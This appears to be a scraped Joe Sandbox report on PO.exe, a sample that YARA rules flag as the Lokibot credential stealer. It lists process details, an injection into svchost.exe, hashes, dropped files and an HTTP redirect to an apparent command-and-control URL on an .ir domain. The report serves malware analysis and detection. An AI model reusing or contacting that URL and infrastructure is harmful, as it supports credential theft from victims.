Feb 25, 2025 05:26:13.795639038 CET	817	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:26:13 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eg7vvlf9EfZf4QhelE3OD9pWj7hSNpBzf9uhOHQWe%2BbXQl9KdaFNdHSsirUgKdKRXCR70iBKzwJn90cZo1qvw3telsqo5mU0hOozwFmiiHe56NZpS9TLZwgukPg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ef9a3a1f18d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2113&min_rtt=2113&rtt_var=1056&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Target ID:	0
Start time:	23:24:06
Start date:	24/02/2025
Path:	C:\Users\user\Desktop\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO.exe"
Imagebase:	0x990000
File size:	966'144 bytes
MD5 hash:	DC844C53658EB8E174BE70D9F7B7E789
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:24:07
Start date:	24/02/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO.exe"
Imagebase:	0x300000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut1D03.tmp

C:\Users\user\AppData\Local\Temp\aut1D42.tmp

C:\Users\user\AppData\Local\Temp\drawlingly

C:\Users\user\AppData\Local\Temp\underbalanced

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
PO.exe